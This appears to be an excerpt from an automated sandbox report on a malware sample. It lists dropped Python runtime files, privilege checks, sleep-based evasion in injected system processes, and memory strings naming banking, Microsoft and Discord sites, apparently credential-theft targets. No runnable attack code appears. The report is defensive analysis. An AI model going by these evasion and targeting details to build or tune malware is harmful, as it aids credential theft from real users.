                    Source: C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI5602\api-ms-win-crt-heap-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI5602\api-ms-win-core-file-l2-1-0.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI5602\api-ms-win-crt-time-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI5602\api-ms-win-crt-string-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI5602\api-ms-win-core-namedpipe-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI5602\select.pydJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI5602\api-ms-win-crt-environment-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI5602\api-ms-win-crt-convert-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI5602\api-ms-win-core-synch-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI5602\api-ms-win-core-heap-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI5602\unicodedata.pydJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI5602\api-ms-win-core-interlocked-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI5602\api-ms-win-core-rtlsupport-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI5602\api-ms-win-crt-math-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI5602\api-ms-win-core-processthreads-l1-1-1.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI5602\api-ms-win-crt-process-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI5602\api-ms-win-core-sysinfo-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI5602\api-ms-win-core-profile-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI5602\python38.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI5602\api-ms-win-crt-filesystem-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI5602\api-ms-win-core-string-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI5602\api-ms-win-core-memory-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI5602\api-ms-win-core-file-l1-2-0.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI5602\api-ms-win-crt-utility-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI5602\api-ms-win-core-processthreads-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI5602\_hashlib.pydJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI5602\api-ms-win-core-util-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI5602\_socket.pydJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI5602\libcrypto-1_1.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI5602\api-ms-win-core-datetime-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_15-16913
                    Source: C:\Users\user\AppData\Roaming\443320E440F81953448019\443320E440F81953448019.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_10-1184
                    Source: C:\Users\user\Desktop\m5804Te9Uw.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_3-1184
                    Source: C:\Windows\System32\audiodg.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_12-1131
                    Source: C:\Windows\System32\msiexec.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_13-1148
                    Source: C:\Windows\System32\svchost.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_4-1129
                    Source: C:\Windows\explorer.exeAPI coverage: 9.0 %
                    Source: C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exeAPI coverage: 1.8 %
                    Source: C:\Windows\System32\svchost.exe TID: 7532Thread sleep count: 621 > 30Jump to behavior
                    Source: C:\Windows\System32\svchost.exe TID: 7532Thread sleep time: -31050000s >= -30000sJump to behavior
                    Source: C:\Windows\System32\svchost.exe TID: 5952Thread sleep count: 671 > 30Jump to behavior
                    Source: C:\Windows\System32\svchost.exe TID: 5952Thread sleep time: -4026000s >= -30000sJump to behavior
                    Source: C:\Windows\System32\svchost.exe TID: 7532Thread sleep time: -50000s >= -30000sJump to behavior
                    Source: C:\Windows\System32\audiodg.exe TID: 7580Thread sleep time: -50000s >= -30000sJump to behavior
                    Source: C:\Windows\System32\audiodg.exe TID: 7580Thread sleep count: 216 > 30Jump to behavior
                    Source: C:\Windows\System32\audiodg.exe TID: 7580Thread sleep time: -10800000s >= -30000sJump to behavior
                    Source: C:\Windows\System32\audiodg.exe TID: 7688Thread sleep count: 276 > 30Jump to behavior
                    Source: C:\Windows\System32\audiodg.exe TID: 7688Thread sleep time: -1656000s >= -30000sJump to behavior
                    Source: C:\Windows\System32\audiodg.exe TID: 7648Thread sleep count: 50 > 30Jump to behavior
                    Source: C:\Windows\System32\audiodg.exe TID: 7648Thread sleep time: -135000s >= -30000sJump to behavior
                    Source: C:\Windows\System32\audiodg.exe TID: 7580Thread sleep time: -50000s >= -30000sJump to behavior
                    Source: C:\Windows\System32\msiexec.exe TID: 7600Thread sleep time: -50000s >= -30000sJump to behavior
                    Source: C:\Windows\System32\msiexec.exe TID: 7600Thread sleep count: 300 > 30Jump to behavior
                    Source: C:\Windows\System32\msiexec.exe TID: 7600Thread sleep time: -15000000s >= -30000sJump to behavior
                    Source: C:\Windows\System32\msiexec.exe TID: 7704Thread sleep count: 62 > 30Jump to behavior
                    Source: C:\Windows\System32\msiexec.exe TID: 7704Thread sleep time: -167400s >= -30000sJump to behavior
                    Source: C:\Windows\System32\msiexec.exe TID: 6956Thread sleep count: 322 > 30Jump to behavior
                    Source: C:\Windows\System32\msiexec.exe TID: 6956Thread sleep time: -1932000s >= -30000sJump to behavior
                    Source: C:\Windows\System32\msiexec.exe TID: 7600Thread sleep time: -50000s >= -30000sJump to behavior
                    Source: C:\Windows\explorer.exe TID: 6060Thread sleep time: -2896550s >= -30000sJump to behavior
                    Source: C:\Windows\explorer.exe TID: 5932Thread sleep time: -2487100s >= -30000sJump to behavior
                    Source: C:\Windows\explorer.exe TID: 5940Thread sleep time: -71250s >= -30000sJump to behavior
                    Source: C:\Windows\explorer.exe TID: 6140Thread sleep time: -90000s >= -30000sJump to behavior
                    Source: C:\Windows\explorer.exe TID: 6060Thread sleep time: -2773050s >= -30000sJump to behavior
                    Source: C:\Windows\explorer.exe TID: 5932Thread sleep time: -946200s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\2FDD.tmp.ssg.exe TID: 1360Thread sleep time: -36893488147419080s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\2FDD.tmp.ssg.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\audiodg.exeLast function: Thread delayed
                    Source: C:\Windows\System32\audiodg.exeLast function: Thread delayed
                    Source: C:\Windows\System32\msiexec.exeLast function: Thread delayed
                    Source: C:\Windows\System32\msiexec.exeLast function: Thread delayed
                    Source: C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exeCode function: 15_2_00007FF79DAD85A0 FindFirstFileExW,FindClose,15_2_00007FF79DAD85A0
                    Source: C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exeCode function: 15_2_00007FF79DAD79B0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,15_2_00007FF79DAD79B0
                    Source: C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exeCode function: 15_2_00007FF79DAF0B84 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,15_2_00007FF79DAF0B84
                    Source: C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exeCode function: 16_2_00007FF79DAD85A0 FindFirstFileExW,FindClose,16_2_00007FF79DAD85A0
                    Source: C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exeCode function: 16_2_00007FF79DAD79B0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,16_2_00007FF79DAD79B0
                    Source: C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exeCode function: 16_2_00007FF79DAF0B84 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,16_2_00007FF79DAF0B84
                    Source: C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exeCode function: 16_2_00007FF821D23280 FindFirstFileExW,FindNextFileW,FindClose,16_2_00007FF821D23280
                    Source: C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exeCode function: 16_2_00007FF821D2303C FindFirstFileExW,FindNextFileW,FindClose,16_2_00007FF821D2303C
                    Source: C:\Users\user\Desktop\m5804Te9Uw.exeCode function: 3_2_00007FF7F73E1444 GetSystemInfo,3_2_00007FF7F73E1444
                    Source: C:\Windows\System32\svchost.exeThread delayed: delay time: 50000Jump to behavior
                    Source: C:\Windows\System32\svchost.exeThread delayed: delay time: 50000Jump to behavior
                    Source: C:\Windows\System32\audiodg.exeThread delayed: delay time: 50000Jump to behavior
                    Source: C:\Windows\System32\audiodg.exeThread delayed: delay time: 50000Jump to behavior
                    Source: C:\Windows\System32\audiodg.exeThread delayed: delay time: 50000Jump to behavior
                    Source: C:\Windows\System32\msiexec.exeThread delayed: delay time: 50000Jump to behavior
                    Source: C:\Windows\System32\msiexec.exeThread delayed: delay time: 50000Jump to behavior
                    Source: C:\Windows\System32\msiexec.exeThread delayed: delay time: 50000Jump to behavior
                    Source: C:\Windows\explorer.exeThread delayed: delay time: 90000Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\2FDD.tmp.ssg.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: 2FDD.tmp.ssg.exe, 00000009.00000002.1567668460.0000000003AAA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive userers - NDCDYNVMware20,11696501413z
                    Source: 2FDD.tmp.ssg.exe, 00000009.00000002.1567668460.0000000003AAA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696501413o
                    Source: 2FDD.tmp.ssg.exe, 00000009.00000002.1567668460.0000000003AAA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696501413h
                    Source: 2FDD.tmp.ssg.exe, 00000009.00000002.1567668460.0000000003AAA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactiveuserers.co.inVMware20,11696501413~
                    Source: 2FDD.tmp.ssg.exe, 00000009.00000002.1565155068.0000000002ADD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696501413
                    Source: 2FDD.tmp.ssg.exe, 00000009.00000002.1567668460.0000000003AAA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696501413j
                    Source: explorer.exe, 00000007.00000002.2545146543.00000000096A1000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: 1efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                    Source: explorer.exe, 00000007.00000000.1287594201.00000000094DC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.2543182442.00000000094DC000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWp
                    Source: 2FDD.tmp.ssg.exe, 00000009.00000002.1567668460.0000000003AAA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive userers - COM.HKVMware20,11696501413
                    Source: explorer.exe, 00000007.00000002.2544936378.00000000095E9000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}?
                    Source: 2FDD.tmp.ssg.exe, 00000009.00000002.1565155068.0000000002ADD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive userers - EU East & CentralVMware20,11696501413
                    Source: explorer.exe, 00000007.00000002.2543182442.000000000952D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1287594201.000000000952D000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                    Source: 2FDD.tmp.ssg.exe, 00000009.00000002.1565155068.0000000002ADD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696501413
                    Source: 2FDD.tmp.ssg.exe, 00000009.00000002.1567668460.0000000003AAA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696501413
                    Source: explorer.exe, 00000007.00000000.1287594201.00000000093B4000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
                    Source: 2FDD.tmp.ssg.exe, 00000009.00000002.1567668460.0000000003AAA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive userers - non-EU EuropeVMware20,11696501413
                    Source: 2FDD.tmp.ssg.exe, 00000009.00000002.1567668460.0000000003AAA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696501413t
                    Source: explorer.exe, 00000007.00000000.1285013932.0000000006F94000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000
                    Source: 2FDD.tmp.ssg.exe, 00000009.00000002.1565155068.0000000002ADD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive userers - COM.HKVMware20,11696501413
                    Source: 2FDD.tmp.ssg.exe, 00000009.00000002.1567668460.0000000003AAA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive userers - HKVMware20,11696501413]
                    Source: explorer.exe, 00000007.00000002.2533196106.0000000000889000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000o;
                    Source: explorer.exe, 00000007.00000002.2544936378.00000000095E9000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware SATA CD00
                    Source: explorer.exe, 00000007.00000002.2544936378.00000000095E9000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: NXTbrVMWare
                    Source: 2FDD.tmp.ssg.exe, 00000009.00000002.1565155068.0000000002ADD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive userers - HKVMware20,11696501413]
                    Source: 2FDD.tmp.ssg.exe, 00000009.00000002.1565155068.0000000002ADD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696501413|UE
                    Source: 2FDD.tmp.ssg.exe, 00000009.00000002.1565155068.0000000002ADD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696501413j
                    Source: 2FDD.tmp.ssg.exe, 00000009.00000002.1565155068.0000000002ADD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696501413x
                    Source: 2FDD.tmp.ssg.exe, 00000009.00000002.1567668460.0000000003AAA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696501413
                    Source: 2FDD.tmp.ssg.exe, 00000009.00000002.1567668460.0000000003AAA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactiveuserers.comVMware20,11696501413}
                    Source: 2FDD.tmp.ssg.exe, 00000009.00000002.1565155068.0000000002ADD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696501413}
                    Source: explorer.exe, 00000007.00000000.1285013932.0000000006F94000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: 2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                    Source: 2FDD.tmp.ssg.exe, 00000009.00000002.1567668460.0000000003AAA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696501413x
                    Source: 2FDD.tmp.ssg.exe, 00000009.00000002.1567668460.0000000003AAA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696501413t
                    Source: explorer.exe, 00000007.00000002.2543182442.00000000094DC000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: %SystemRoot%\system32\mswsock.dlldRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
                    Source: 2FDD.tmp.ssg.exe, 00000009.00000002.1565155068.0000000002ADD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696501413
                    Source: 2FDD.tmp.ssg.exe, 00000009.00000002.1567668460.0000000003AAA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactiveuserers.comVMware20,11696501413
                    Source: explorer.exe, 00000007.00000002.2544936378.00000000095E9000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
                    Source: explorer.exe, 00000007.00000003.1655646473.0000000002FBF000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                    Source: 2FDD.tmp.ssg.exe, 00000009.00000002.1567668460.0000000003AAA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696501413
                    Source: 2FDD.tmp.ssg.exe, 00000009.00000002.1565155068.0000000002ADD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696501413
                    Source: 2FDD.tmp.ssg.exe, 00000009.00000002.1565155068.0000000002ADD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696501413x
                    Source: 2FDD.tmp.ssg.exe, 00000009.00000002.1565155068.0000000002ADD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696501413s
                    Source: 2FDD.tmp.ssg.exe, 00000009.00000002.1565155068.0000000002ADD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696501413f
                    Source: 2FDD.tmp.ssg.exe, 00000009.00000002.1567668460.0000000003AAA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696501413
                    Source: 2FDD.tmp.ssg.exe, 00000009.00000002.1565155068.0000000002ADD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactiveuserers.comVMware20,11696501413
                    Source: 2FDD.tmp.ssg.exe, 00000009.00000002.1567668460.0000000003AAA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696501413|UE
                    Source: 2FDD.tmp.ssg.exe, 00000009.00000002.1565155068.0000000002ADD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696501413^
                    Source: 2FDD.tmp.ssg.exe, 00000009.00000002.1567668460.0000000003AAA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696501413x
                    Source: 2FDD.tmp.ssg.exe, 00000009.00000002.1565155068.0000000002ADD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696501413x
                    Source: 2FDD.tmp.ssg.exe, 00000009.00000002.1565155068.0000000002ADD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696501413
                    Source: 2FDD.tmp.ssg.exe, 00000009.00000002.1565155068.0000000002ADD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696501413h
                    Source: 2FDD.tmp.ssg.exe, 00000009.00000002.1567668460.0000000003AAA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696501413}
                    Source: explorer.exe, 00000007.00000000.1287594201.00000000093B4000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: 2VMware Virtual USB MouseJC:\Windows\System32\DDORes.dll,-2212
                    Source: 2FDD.tmp.ssg.exe, 00000009.00000002.1565155068.0000000002ADD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696501413
                    Source: 2FDD.tmp.ssg.exe, 00000009.00000002.1565155068.0000000002ADD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactiveuserers.co.inVMware20,11696501413d
                    Source: 2FDD.tmp.ssg.exe, 00000009.00000002.1567668460.0000000003AAA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696501413x
                    Source: 2FDD.tmp.ssg.exe, 00000009.00000002.1564021920.000000000093B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                    Source: 2FDD.tmp.ssg.exe, 00000009.00000002.1567668460.0000000003AAA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696501413s
                    Source: 2FDD.tmp.ssg.exe, 00000009.00000002.1565155068.0000000002ADD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696501413t
                    Source: 2FDD.tmp.ssg.exe, 00000009.00000002.1567668460.0000000003AAA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive userers - EU East & CentralVMware20,11696501413
                    Source: explorer.exe, 00000007.00000002.2533196106.0000000000889000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000/;
                    Source: explorer.exe, 00000007.00000002.2544936378.00000000095E9000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
                    Source: 2FDD.tmp.ssg.exe, 00000009.00000002.1565155068.0000000002ADD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696501413t
                    Source: 2FDD.tmp.ssg.exe, 00000009.00000002.1565155068.0000000002ADD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive userers - EU WestVMware20,11696501413n
                    Source: 2FDD.tmp.ssg.exe, 00000009.00000002.1565155068.0000000002ADD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactiveuserers.comVMware20,11696501413}
                    Source: 2FDD.tmp.ssg.exe, 00000009.00000002.1567668460.0000000003AAA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696501413u
                    Source: 2FDD.tmp.ssg.exe, 00000009.00000002.1567668460.0000000003AAA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive userers - GDCDYNVMware20,11696501413p
                    Source: 2FDD.tmp.ssg.exe, 00000009.00000002.1567668460.0000000003AAA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive userers - EU WestVMware20,11696501413n
                    Source: 2FDD.tmp.ssg.exe, 00000009.00000002.1565155068.0000000002ADD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696501413u
                    Source: 2FDD.tmp.ssg.exe, 00000009.00000002.1565155068.0000000002ADD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive userers - NDCDYNVMware20,11696501413z
                    Source: 2FDD.tmp.ssg.exe, 00000009.00000002.1565155068.0000000002ADD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive userers - non-EU EuropeVMware20,11696501413
                    Source: 2FDD.tmp.ssg.exe, 00000009.00000002.1565155068.0000000002ADD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactiveuserers.co.inVMware20,11696501413~
                    Source: 2FDD.tmp.ssg.exe, 00000009.00000002.1567668460.0000000003AAA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696501413
                    Source: 2FDD.tmp.ssg.exe, 00000009.00000002.1567668460.0000000003AAA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactiveuserers.co.inVMware20,11696501413d
                    Source: 2FDD.tmp.ssg.exe, 00000009.00000002.1565155068.0000000002ADD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive userers - GDCDYNVMware20,11696501413p
                    Source: 2FDD.tmp.ssg.exe, 00000009.00000002.1567668460.0000000003AAA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696501413
                    Source: 2FDD.tmp.ssg.exe, 00000009.00000002.1567668460.0000000003AAA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696501413^
                    Source: 2FDD.tmp.ssg.exe, 00000009.00000002.1565155068.0000000002ADD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696501413o
                    Source: 2FDD.tmp.ssg.exe, 00000009.00000002.1567668460.0000000003AAA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696501413f
                    Source: C:\Users\user\Desktop\m5804Te9Uw.exeAPI call chain: ExitProcess graph end nodegraph_3-922
                    Source: C:\Users\user\Desktop\m5804Te9Uw.exeAPI call chain: ExitProcess graph end nodegraph_3-924
                    Source: C:\Users\user\Desktop\m5804Te9Uw.exeAPI call chain: ExitProcess graph end nodegraph_3-926
                    Source: C:\Windows\System32\svchost.exeAPI call chain: ExitProcess graph end nodegraph_4-870
                    Source: C:\Windows\System32\svchost.exeAPI call chain: ExitProcess graph end nodegraph_4-867
                    Source: C:\Windows\System32\svchost.exeAPI call chain: ExitProcess graph end nodegraph_4-877
